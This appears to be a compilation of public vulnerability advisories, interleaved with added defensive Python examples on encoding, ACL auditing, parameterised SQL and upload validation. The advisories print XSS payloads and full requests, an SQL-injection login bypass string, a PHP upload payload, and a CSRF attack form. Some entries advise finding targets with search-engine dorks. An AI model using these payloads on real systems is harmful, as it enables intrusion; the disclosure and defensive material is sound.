<pre><code># Exploit Title: Stored Cross-Site Scripting on Best POS Management System<br /># Google Dork: NA<br /># Date: 14/2/2023<br /># Exploit Author: Ahmed Ismail (@MrOz1l)<br /># Vendor Homepage:<br />https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html<br /># Software Link:<br />https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip<br /># Version: 1.0<br /># Tested on: Windows 11<br /># CVE : NA<br /><br /># Description<br /><br />The Name parameter of the Add Category form is stored and later rendered back into the page without encoding, so the payload below executes once the category has been added.<br /><br />Payload : "><img src=x onerror=prompt(document.domain);><br /><br /># POC :<br />1- Go to Add Category at<br />"http://localhost/kruxton/index.php?page=add-category"<br /><br />2- In the Name parameter, enter the payload "><img src=x<br />onerror=prompt(document.domain);><br /><br />3- After the category is added, the XSS fires<br /><br />```<br />POST /kruxton/ajax.php?action=save_category HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/109.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data;<br />boundary=---------------------------7128987773293048653857517<br />Content-Length: 442<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/kruxton/index.php?page=add-category<br />Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------7128987773293048653857517<br />Content-Disposition: form-data; name="id"<br /><br /><br />-----------------------------7128987773293048653857517<br />Content-Disposition: form-data; name="name"<br /><br />XSSPOC"><img src=x onerror=prompt(document.domain);><br />-----------------------------7128987773293048653857517<br />Content-Disposition: form-data; name="description"<br /><br />This is POC<br />-----------------------------7128987773293048653857517--<br />```<br /><br />--------------------------------------<br /><br /># Exploit Title: Stored Cross-Site Scripting on Best POS Management System<br /># Google Dork: NA<br /># Date: 17/2/2023<br /># Exploit Author: Ahmed Ismail (@MrOz1l)<br /># Vendor Homepage:<br />https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html<br /># Software Link:<br />https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip<br /># Version: 1.0<br /># Tested on: Windows 11<br /># CVE : NA<br /><br />Payload : "><img src=x onerror=prompt(document.domain);><br /><br /># POC :<br />1- Go to Add Category at<br />"http://localhost/kruxton/ajax.php?action=save_product"<br /><br />2- In the Name parameter, enter the payload "><img src=x<br />onerror=prompt(document.domain);><br /><br />and in the Description parameter <img src=x onerror=prompt(2);><br /><br />3- After the category is added, the XSS fires<br /><br />```<br />POST /kruxton/ajax.php?action=save_product HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/109.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data;<br />boundary=---------------------------11015616619250686693182759357<br />Content-Length: 830<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/kruxton/index.php?page=add-product<br />Cookie: PHPSESSID=<COOKIE><br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------11015616619250686693182759357<br />Content-Disposition: form-data; name="id"<br /><br /><br />-----------------------------11015616619250686693182759357<br />Content-Disposition: form-data; name="category_id"<br /><br />3'<br />-----------------------------11015616619250686693182759357<br />Content-Disposition: form-data; name="name"<br /><br />XSSPOC2"><img src=x onerror=prompt(document.domain);><br />-----------------------------11015616619250686693182759357<br />Content-Disposition: form-data; name="description"<br /><br />XSSPOC2"><img src=x onerror=prompt(2);><br />-----------------------------11015616619250686693182759357<br />Content-Disposition: form-data; name="price"<br /><br />1122<br />-----------------------------11015616619250686693182759357<br />Content-Disposition: form-data; name="status"<br /><br />1<br />-----------------------------11015616619250686693182759357--<br /><br />```<br /></code></pre>
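The `">` at the start of the payload above only works because the saved category name is written back into an HTML attribute without encoding. The following is an added example, not code from the advisory or from the POS application; it assumes the attribute context and shows the unencoded rendering next to an attribute-encoded one, using Python's own HTML parser to show which elements a browser would actually build from each.

```python
"""Added example (not from the advisory): output encoding for a stored value.

Assumption: the application echoes the stored category name back inside an
HTML attribute, which is what the "> breakout in the advisory payload targets.
"""
import html
from html.parser import HTMLParser

# Constructed sample: the category name exactly as it would come back from the
# database after the request in the advisory is saved.
STORED_NAME = 'XSSPOC"><img src=x onerror=prompt(document.domain);>'


def render_unsafe(name: str) -> str:
    """Concatenates the stored value into an attribute with no encoding."""
    return f'<input type="text" name="name" value="{name}">'


def render_safe(name: str) -> str:
    """Encodes for the attribute context; quote=True also turns " into &quot;."""
    return f'<input type="text" name="name" value="{html.escape(name, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees, with its attribute names."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, list[str]]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, sorted(name for name, _ in attrs)))


def parsed_tags(fragment: str) -> list[tuple[str, list[str]]]:
    """Returns the elements a browser would build from the fragment."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


def has_event_handler(fragment: str) -> bool:
    """True if any element carries an on* attribute, i.e. the value broke out."""
    return any(attr.startswith("on")
               for _, attrs in parsed_tags(fragment) for attr in attrs)


if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        print(label, parsed_tags(render(STORED_NAME)))
```

With the unencoded rendering the parser reports two elements, `input` followed by an `img` with an `onerror` attribute; with the encoded rendering it reports a single `input` whose value attribute holds the whole string. Encoding has to be chosen per context (attribute, text node, URL, JavaScript), so the same value needs a different encoder if it is ever placed outside an attribute.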
<pre><code># Exploit Title: Zabbix agents - Insecure Permissions on non-default installation directory location<br /># Discovery by: mmg<br /># Discovery Date: 2023-01-23<br /># Vendor Homepage: https://www.zabbix.com/download_agents<br /># Software Link Zabbix agent : https://cdn.zabbix.com/zabbix/binaries/stable/6.2/6.2.7/zabbix_agent-6.2.7-windows-amd64-openssl.msi<br /># Software Link Zabbix agent 2 : https://cdn.zabbix.com/zabbix/binaries/stable/6.2/6.2.7/zabbix_agent2-6.2.7-windows-amd64-openssl.msi<br /># Tested Version: Zabbix agent and Zabbix agent 2 (v6.2.6, v6.2.7 and older versions)<br /># Vulnerability Type: Local Privilege Escalation<br /># Tested on OS: Windows 10 Pro Version 22H2 (OS Build 19045.2486) x64 version<br /># CVSSv3 Vectors : https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H<br /># CVE N/A<br /><br /><br /># Steps to discover:<br /><br />Go to Start and type powershell.<br />Enter the following command and press Enter:<br />Get-WmiObject win32_service | ?{ $_.Name -like '*zabbix*' -and $_.Pathname -notlike "*C:\Program Files*"}| select Name,PathName<br /><br /># Example of a vulnerable installation<br /><br />Name PathName<br />---- --------<br />Zabbix Agent "C:\Software\Zabbix Agent\zabbix_agentd.exe" --config "C:\Software\Zabbix Agent\zabbix_agentd.conf"<br />Zabbix Agent 2 "D:\software\Zabbix Agent 2\zabbix_agent2.exe" -c "D:\software\Zabbix Agent 2\zabbix_agent2.conf" -f=false<br /><br /># Exploit:<br /><br />A vulnerability was found in Zabbix Agent and Zabbix Agent 2 when they are installed in a non-default directory.<br />The agent executables have incorrect permissions, allowing a local unprivileged user to replace them<br />with a malicious file that will be executed with "LocalSystem" privileges, resulting in complete<br />compromise of Confidentiality, Integrity and Availability.<br /><br /><br /># Timeline<br />Jan 23, 2023 - Reported to Zabbix<br />Feb 1, 2023 - Zabbix does not consider this a vulnerability<br />Feb 6, 2023 - Requested official approval to disclose it<br />Feb 8, 2023 - Zabbix agrees with public disclosure<br />Feb 13, 2023 - Public disclosure<br /></code></pre>
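The PowerShell one-liner above only finds services installed outside Program Files; whether such an installation is actually exploitable depends on the ACL of the executable. The following is an added audit helper, not part of the advisory or of Zabbix, that takes the `PathName` string exactly as Win32_Service reports it, extracts the executable, checks whether it lives under a protected root, and parses `icacls` output to see whether a low-privilege identity can write to it. The `icacls` listings embedded below are constructed to mirror the advisory's vulnerable example; `run_icacls()` is the only part that needs a real Windows host.

```python
"""Added example (not from the advisory): audit service binaries for weak ACLs.

Assumptions: the service command line comes from Win32_Service.PathName (as in
the PowerShell one-liner above) and the ACL comes from `icacls <file>` output.
The sample strings below are constructed; run_icacls() is for real Windows hosts.
"""
import re
import subprocess

PROTECTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")
LOW_PRIV_IDENTITIES = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# icacls right tokens that allow changing the file's contents or replacing it
WRITE_RIGHTS = {"F", "M", "W", "GW", "GA", "WD", "AD", "WA", "WEA", "DC", "D", "WDAC", "WO"}

_ACE_RE = re.compile(r"(?P<identity>[^()]+?):(?P<flags>(?:\([^)]*\))+)\s*$")


def executable_from_pathname(pathname: str) -> str:
    """Extracts the executable from a service PathName, quoted or bare."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return pathname[1:pathname.index('"', 1)]
    return pathname.split(" ")[0]


def in_protected_root(path: str) -> bool:
    return path.lower().startswith(PROTECTED_ROOTS)


def parse_icacls(output: str, path: str) -> list[tuple[str, set[str]]]:
    """Parses `icacls <path>` output into (identity, set of flag tokens)."""
    aces = []
    for line in output.splitlines():
        if line.lower().startswith(path.lower()):   # first line carries the path
            line = line[len(path):]
        match = _ACE_RE.search(line)
        if not match:
            continue
        tokens = set()
        for group in re.findall(r"\(([^)]*)\)", match.group("flags")):
            tokens.update(t.strip() for t in group.split(","))
        aces.append((match.group("identity").strip(), tokens))
    return aces


def writable_by_low_priv(aces) -> list[str]:
    """Identities from LOW_PRIV_IDENTITIES holding a write-capable allow ACE."""
    hits = []
    for identity, tokens in aces:
        if "DENY" in tokens or identity.lower() not in LOW_PRIV_IDENTITIES:
            continue
        if tokens & WRITE_RIGHTS:
            hits.append(identity)
    return hits


def assess(pathname: str, icacls_output: str) -> dict:
    """Combines the location check with the ACL check for one service."""
    exe = executable_from_pathname(pathname)
    return {
        "executable": exe,
        "outside_protected_root": not in_protected_root(exe),
        "writable_by": writable_by_low_priv(parse_icacls(icacls_output, exe)),
    }


def run_icacls(path: str) -> str:
    """Real lookup on a Windows host: runs `icacls <path>` (assumed on PATH)."""
    return subprocess.run(["icacls", path], capture_output=True, text=True, check=True).stdout


# Constructed samples: the PathName from the advisory's vulnerable example and
# made-up icacls listings; in the first, BUILTIN\Users inherited Full control.
VULN_PATHNAME = '"C:\\Software\\Zabbix Agent\\zabbix_agentd.exe" --config "C:\\Software\\Zabbix Agent\\zabbix_agentd.conf"'
VULN_ICACLS = (
    "C:\\Software\\Zabbix Agent\\zabbix_agentd.exe BUILTIN\\Users:(I)(F)\n"
    "                                            NT AUTHORITY\\SYSTEM:(I)(F)\n"
    "                                            BUILTIN\\Administrators:(I)(F)\n"
    "\nSuccessfully processed 1 files; Failed processing 0 files\n"
)
OK_PATHNAME = '"C:\\Program Files\\Zabbix Agent\\zabbix_agentd.exe" --config "C:\\Program Files\\Zabbix Agent\\zabbix_agentd.conf"'
OK_ICACLS = (
    "C:\\Program Files\\Zabbix Agent\\zabbix_agentd.exe BUILTIN\\Users:(I)(RX)\n"
    "                                                 NT AUTHORITY\\SYSTEM:(I)(F)\n"
    "                                                 BUILTIN\\Administrators:(I)(F)\n"
)

if __name__ == "__main__":
    print(assess(VULN_PATHNAME, VULN_ICACLS))
    print(assess(OK_PATHNAME, OK_ICACLS))
```

On a live host, pair `assess()` with `run_icacls()` for each service returned by the WMI query; a non-empty `writable_by` on a service running as LocalSystem is the condition the advisory describes, and the fix is to reinstall under Program Files or to strip write rights for non-administrators from the install directory.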
<pre><code>====================================================================================================================================<br />| # Title : Demanzo Matrimony v.1.5 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.1(32-bit) | <br />| # Vendor : https://demanzo.com/matrimony-site-development/ | <br />| # Dork : Powered by ITAcumens or "Powered by Demanzo" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Affected file: add-staff.php<br /><br />[+] Inside folder /admin/add-staff.php<br /><br />[+] Dork in Google or another search engine.<br /><br />[+] Copy the code below and paste it into an HTML file.<br /><br />[+] Go to line 2.<br /><br />[+] Set the target site link, save changes and apply.<br /><br /></div><br /> <form action="https://www.example/web/html/admin/add-staff.php" method="POST"><br /> <div id="msg"><br /> <div class="form-group ban_btm1 col-md-6 no_pad"><br /> <label class="control-label col-md-4 frm_pd">Name <span class="red">*</span> : </label><br /> <div class="col-md-8 frm_pd"><br /> <input required="" name="name" id="name" value="" type="text" class="form-control" placeholder="Enter Name"> <br /> </div><br /> </div><br /> <br /> <div class="form-group ban_btm1 col-md-6 no_pad"><br /> <label class="control-label col-md-4 frm_pd">Password <span class="red">*</span> : </label><br /> <div class="col-md-8 frm_pd"><br /> <input required="" name="pass" id="pass" value="" type="password" class="form-control" placeholder="Enter Password"> <br /> </div><br /> </div><br /> <br /> <div class="form-group ban_btm1 col-md-6 no_pad"><br /> <label class="control-label col-md-4 frm_pd">Email ID <span class="red">*</span> : </label><br /> <div class="col-md-8 frm_pd"><br /> <input required="" name="email" id="email" value="" 
type="email" class="form-control" placeholder="Enter Email ID"> <br /> </div><br /> </div><br /> <br /> <div class="form-group ban_btm1 col-md-6 no_pad"><br /> <label class="control-label col-md-4 frm_pd">Gender <span class="red">*</span> : </label><br /> <div class="col-md-8 frm_pd"> <br /> <input type="radio" name="gender" value="Male" checked=""><label class="rd_btn">Male</label><br /> <input type="radio" name="gender" value="Female"><label class="rd_btn">Female</label><br /> </div><br /> </div><br /> <br /> <div class="form-group ban_btm1 col-md-12 no_pad"><br /> <label class="control-label frm_pd col-md-2">Designation <span class="red">*</span> : </label><br /> <div class="col-md-10 frm_pd"><br /> <input required="" name="designation" value="" id="designation" type="text" class="form-control" placeholder="Enter Designation"> <br /> </div><br /> </div> <br /> <br /> <div class="form-group ban_btm1 col-md-12 no_pad"><br /> <label class="control-label col-md-2 frm_pd">Address <span class="red">*</span> : </label><br /> <div class="col-md-10 frm_pd"><br /> <textarea required="" name="address" id="address" rows="7" class="form-control" placeholder="Enter Address"></textarea> <br /> </div><br /> </div> <br /> <br /> <!-- <div class="form-group ban_btm1 col-md-12 no_pad"> --><br /> <!-- <label class="control-label col-md-2 frm_pd">Access Level <span class="red">*</span> : </label> --><br /> <!-- <div class="col-md-10 frm_pd chk_box"> --><br /> <!-- <input id="access1" type="checkbox" checked /> <label for="access1" class="col-lg-3 col-md-5 col-sm-6">All</label> --><br /> <!-- <input id="access2" type="checkbox" /> <label for="access2" class="col-lg-4 col-md-7 col-sm-6">Manage Plan</label> --><br /> <!-- <input id="access3" type="checkbox" /> <label for="access3" class="col-lg-5 col-md-5 col-sm-6">Manage Kootam / Kulam</label> --><br /> <!-- <input id="access4" type="checkbox" /> <label for="access4" class="col-lg-3 col-md-7 col-sm-6">To Approve</label> --><br /> <!-- 
<input id="access5" type="checkbox" /> <label for="access5" class="col-lg-4 col-md-5 col-sm-6">Manage Success Stories</label> --><br /> <!-- <input id="access6" type="checkbox" /> <label for="access6" class="col-lg-5 col-md-7 col-sm-6">Manage Advertisement</label> --><br /> <!-- <input id="access7" type="checkbox" /> <label for="access7" class="col-lg-3 col-md-5 col-sm-6">Manage Staff</label> --><br /> <!-- <input id="access8" type="checkbox" /> <label for="access8" class="col-lg-4 col-md-7 col-sm-6">Manage Member</label> --><br /> <!-- <input id="access9" type="checkbox" /> <label for="access9" class="col-lg-5 col-md-5 col-sm-6">Manage City</label> --><br /> <!-- <input id="access10" type="checkbox" /> <label for="access10" class="col-lg-3 col-md-7 col-sm-6">Manage State</label> --><br /> <!-- <input id="access11" type="checkbox" /> <label for="access11" class="col-lg-4 col-md-5 col-sm-6">Manage Country</label> --><br /> <!-- <input id="access12" type="checkbox" /> <label for="access12" class="col-lg-5 col-md-7 col-sm-6">Manage Education</label> --><br /> <!-- <input id="access13" type="checkbox" /> <label for="access13" class="col-lg-3 col-md-5 col-sm-6">Reports</label> --><br /> <!-- <input id="access14" type="checkbox" /> <label for="access14" class="col-lg-4 col-md-7 col-sm-6">Ematch</label> --><br /> <!-- <input id="access15" type="checkbox" /> <label for="access15" class="col-lg-5 col-md-5 col-sm-6">Advanced Search</label> --><br /> <!-- <input id="access16" type="checkbox" /> <label for="access16" class="col-lg-3 col-md-7 col-sm-6">Group Mail</label> --><br /> <!-- <input id="access17" type="checkbox" /> <label for="access17" class="col-lg-4 col-md-5 col-sm-6">Featured Profiles</label> --><br /> <!-- <input id="access18" type="checkbox" /> <label for="access18" class="col-lg-5 col-md-7 col-sm-6">Upgrade / Renewal Membership</label> --><br /> <!-- <input id="access19" type="checkbox" /> <label for="access19" class="col-lg-3 col-md-5 col-sm-6">Accounts 
</label> --><br /> <!-- <input id="access20" type="checkbox" /> <label for="access20" class="col-lg-4 col-md-7 col-sm-6">Logo</label> --><br /> <!-- <input id="access21" type="checkbox" /> <label for="access21" class="col-lg-5 col-md-5 col-sm-6">Religion</label> --><br /> <!-- </div> --><br /> <!-- </div> --><br /> <br /> <!-- <div class="form-group ban_btm1 col-lg-7 col-md-12 no_pad"> --><br /> <!-- <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">IP Address Controls <span class="red">*</span> : </label> --><br /> <!-- <div class="col-lg-8 col-md-10 frm_pd chk_box"> --><br /> <!-- <input id="status1" type="checkbox" checked /> <label for="status1" class="col-md-4">All</label> --><br /> <!-- <input id="status2" type="checkbox" /> <label for="status2" class="col-md-8">192.168.10.156</label> --><br /> <!-- </div> --><br /> <!-- </div> --><br /> <br /> <div class="form-group ban_btm1 col-lg-5 col-md-12 no_pad"><br /> <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">Staff Status <span class="red">*</span> : </label><br /> <div class="col-lg-8 col-md-10 frm_pd"> <br /> <input type="radio" name="status" value="0" checked=""><label class="rd_btn">Active</label><br /> <input type="radio" name="status" value="1"><label class="rd_btn">Inactive</label><br /> </div><br /> </div><br /> <br /> <div class="col-md-2 col-md-offset-5 col-sm-12"><br /> <input type="submit" class="ctn_btn no_mt1" value="Add" name="add"><br /> </div> <br /> <br /><br />Greetings to :===================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet| <br />==================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Argon Dashboard - v1.1.2 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0(64-bit) | <br />| # Vendor : https://www.creative-tim.com/product/argon-dashboard# | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dork in Google or another search engine.<br /><br />[+] Use payload : user : 'or''='@gmail.com1 & Pass : 'or''='<br /><br />[+] https://127.0.0.1/aadarshinstrumentscom/admin/examples/inquiry.php<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |<br />=======================================================================================================================================<br /></code></pre>
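The quoted user and password values only log in because the application pastes them into a SQL string, so the closing quote and the trailing `''=''` become part of the WHERE clause. The following is an added example, not the Argon Dashboard code, that shows the string-built query accepting exactly those values and a parameterised lookup with hashed passwords rejecting them; the table, column names and the single admin account are made up, and SQLite stands in for the real database.

```python
"""Added example (not from the advisory): why `'or''='` logs in, and the fix.

Assumptions: a login that compares email and password in SQL; the table and
column names are made up. SQLite stands in for the real database.
"""
import hashlib
import hmac
import os
import sqlite3

PAYLOAD_USER = "'or''='@gmail.com1"   # credentials quoted in the advisory
PAYLOAD_PASS = "'or''='"


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def build_db() -> sqlite3.Connection:
    """In-memory admin table with one account (constructed sample data).

    The plaintext `pass` column exists only so the vulnerable query can be shown;
    the safe path uses the salted hash.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admin (id INTEGER PRIMARY KEY, email TEXT, pass TEXT, salt BLOB, pass_hash BLOB)"
    )
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO admin (email, pass, salt, pass_hash) VALUES (?, ?, ?, ?)",
        ("admin@example.test", "correct horse", salt, _hash_password("correct horse", salt)),
    )
    return conn


def vulnerable_login(email: str, password: str) -> bool:
    """String-built query: quotes in the input become SQL syntax.

    With the advisory's values the WHERE clause ends in `OR ''=''`, which is
    always true, so a row is returned for any account.
    """
    conn = build_db()
    query = f"SELECT id FROM admin WHERE email='{email}' AND pass='{password}'"
    return conn.execute(query).fetchone() is not None


def safe_login(email: str, password: str) -> bool:
    """Parameterised lookup plus a constant-time hash comparison."""
    conn = build_db()
    row = conn.execute(
        "SELECT salt, pass_hash FROM admin WHERE email = ?", (email,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(_hash_password(password, salt), stored)


if __name__ == "__main__":
    print("vulnerable:", vulnerable_login(PAYLOAD_USER, PAYLOAD_PASS))
    print("safe:", safe_login(PAYLOAD_USER, PAYLOAD_PASS))
```

The parameterised version never interprets the input as SQL, so the quotes are compared literally against the email column and no row matches; hashing with a per-user salt and `compare_digest` is the second half of the fix, because a parameterised query against plaintext passwords would still leak them on any other read of the table.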
<pre><code>## Title: atrocore-1.5.25 User interaction - Unauthenticated File upload - RCE<br />## Author: nu11secur1ty<br />## Date: 02.16.2023<br />## Vendor: https://atropim.com/<br />## Software: https://github.com/atrocore/atrocore/releases/tag/1.5.25<br />## Reference: https://portswigger.net/web-security/file-upload<br /><br />## Description:<br />The `Create Import Feed` option with the `glyphicon-glyphicon-paperclip`<br />function appears to be vulnerable to user-interaction,<br />unauthenticated file upload leading to RCE.<br />The attacker can easily upload a malicious file, then execute it<br />and obtain very sensitive information about the configuration of the<br />system; after this he can perform a much more serious attack.<br /><br /><br />STATUS: HIGH Vulnerability CRITICAL<br /><br />[+]Payload:<br /><br />```PHP<br /><?php<br /> phpinfo();<br />?><br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/atrocore/atrocore-1.5.25)<br /><br />## Reference:<br />[href](https://portswigger.net/web-security/file-upload)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/g8998d)<br /><br />## Time spent:<br />00:45:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
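An upload that accepts the payload above has skipped every server-side check an attachment handler needs. The following is an added example, not AtroCore code, of the checks a file field like the import-feed attachment should apply: an extension allow-list, rejection of executable extensions anywhere in the name, a magic-byte check so the content matches the claimed type, a server-chosen random filename, and storage outside the web root. The allow-list, storage path and sample files are constructed for the demo.

```python
"""Added example (not from the advisory): server-side checks for an upload field.

Assumptions: the import-feed attachment is meant to be a data file or image; the
allow-list, storage directory and naming scheme below are made up for the demo.
"""
import os
import secrets
import tempfile
from typing import Optional

ALLOWED = {"png", "jpg", "jpeg", "gif", "pdf", "csv"}
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "htaccess", "cgi"}
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
UPLOAD_DIR = "/var/lib/app/uploads"   # assumed: outside the web root, no script handler

# Constructed samples: a minimal PNG header and the advisory's PHP payload.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_SAMPLE = b"<?php\n phpinfo();\n?>\n"


def validate_upload(filename: str, content: bytes) -> tuple[bool, str]:
    """Returns (accepted, reason). The reason is for the server log, not the client."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "no extension"
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not allowed"
    if any(p in EXECUTABLE_EXTS for p in parts[:-1]):
        return False, "executable extension in name"   # e.g. shell.php.png
    if not content:
        return False, "empty file"
    if ext in MAGIC and not content.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    if ext == "csv" and (b"<?" in content or b"\x00" in content):
        return False, "csv contains script or binary markers"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Random server-chosen name; the client-supplied name never reaches disk."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


def save_upload(filename: str, content: bytes, root: str = UPLOAD_DIR) -> Optional[str]:
    """Validates, then writes under `root` with a fresh name; None if rejected."""
    ok, _reason = validate_upload(filename, content)
    if not ok:
        return None
    path = os.path.join(root, stored_name(filename))
    with open(path, "xb") as fh:          # "x": never overwrite an existing file
        fh.write(content)
    return path


def demo_root() -> str:
    """Temporary directory standing in for UPLOAD_DIR when run locally."""
    return tempfile.mkdtemp(prefix="uploads-")


if __name__ == "__main__":
    root = demo_root()
    for name, data in (("shell.php", PHP_SAMPLE), ("photo.png", PNG_SAMPLE)):
        print(name, validate_upload(name, data), save_upload(name, data, root))
```

Serving the stored files back through a handler that sets `Content-Disposition: attachment` and a fixed `Content-Type`, rather than from a directory the web server executes scripts in, is what makes the remaining residual risk (a valid image that also parses as something else) harmless.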
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230214-0 ><br />=======================================================================<br /> title: Multiple XSS Vulnerabilities<br /> product: B&R Systems Diagnostics Manager<br /> vulnerable version: >=3.00 and <=C4.93<br /> fixed version: >=D4.93<br /> CVE number: CVE-2022-4286<br /> impact: medium<br /> homepage: https://www.br-automation.com<br /> found: 2022-10-28<br /> by: S. Robertz (Office Vienna)<br /> G. Hechenberger (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Our slogan is our mission. The pursuit of Perfection in Automation has<br />inspired and guided B&R for over 40 years. To us, perfection means more<br />than developing the best solutions in industrial automation. It also means<br />developing the best relationships – with our customers and partners as<br />well as our employees and suppliers.<br /><br />Keen foresight and entrepreneurial courage helped us rise quickly into<br />the ranks of top global players in industrial automation. 
An intuitive sense<br />of market dynamics and emerging trends has established us as a pioneer,<br />leading the way with the most innovative technology on the market.<br /><br />Our role as the ABB Group's global center for machine and factory automation<br />strengthens our position of leadership and adds new momentum to our<br />impressive record of sustained growth."<br /><br />Source: https://www.br-automation.com/en/about-us/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a software update which should be installed immediately.<br /><br />SEC Consult highly recommends performing a thorough security review of the<br />product, conducted by security professionals, to identify and resolve potential<br />further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Multiple Reflected Cross-Site-Scripting Vulnerabilities (CVE-2022-4286)<br />An attacker can execute arbitrary JavaScript code in the context of the<br />victim's session, and thus perform all actions, exfiltrate information, etc.<br />In order to exploit this vulnerability the attacker will have to trick<br />the user into visiting a manipulated URL.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Multiple Reflected Cross-Site-Scripting Vulnerabilities (CVE-2022-4286)<br />The following URL has to be visited by the victim in order to execute<br />arbitrary JavaScript code.<br /><br />http://<PLC-IP>/sdm/cgiFileLoop.cgi?service=javascript:alert(document.domain);%2f%2f&type=512&scope=%3Cfile:///etc/passwd%3E&module=Snapshot&option=3<br /><br />A very similar vulnerability can be found at another endpoint of the<br />System Diagnostic Manager (SDM).<br /><br />http://<PLC-IP>/sdm/svg.cgi?type=cpuusage&index=1%3Cscript%3Ealert(document.domain)%3C/script%3E<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following device and firmware version has been tested:<br />* B&R X20CP3687X SwModuleVersion 186<br /><br />According to the vendor, all B&R Automation Runtime (AR) versions >=3.00 and <=C4.93<br />are affected.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-11-21: Contacting vendor through cybersecurity@br-automation.com.<br /> Sent encrypted advisory.<br />2022-11-22: Vendor requests B&R Automation Runtime version.<br />2022-12-01: Vendor confirms vulnerability. Will be fixed with next release.<br /> Asking for timeline.<br />2022-12-13: Advisory and patch will be published on 2023-02-10.<br /> Vendor offers to share the advisory for review purposes.<br />2023-01-25: Reviewing vendor advisory, receiving CVE + affected/fixed version<br /> numbers<br />2023-02-10: Vendor provides the patch.<br />2023-02-14: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor supplies a patch, which should be installed immediately.<br />The following version mitigates the identified XSS issues:<br />* B&R Automation Runtime version >=D4.93<br /><br />The vendor has published the following security advisory:<br />https://www.br-automation.com/downloads_br_productcatalogue/assets/1675607299099-en-original-1.0.pdf<br /><br /><br />Workaround:<br />-----------<br 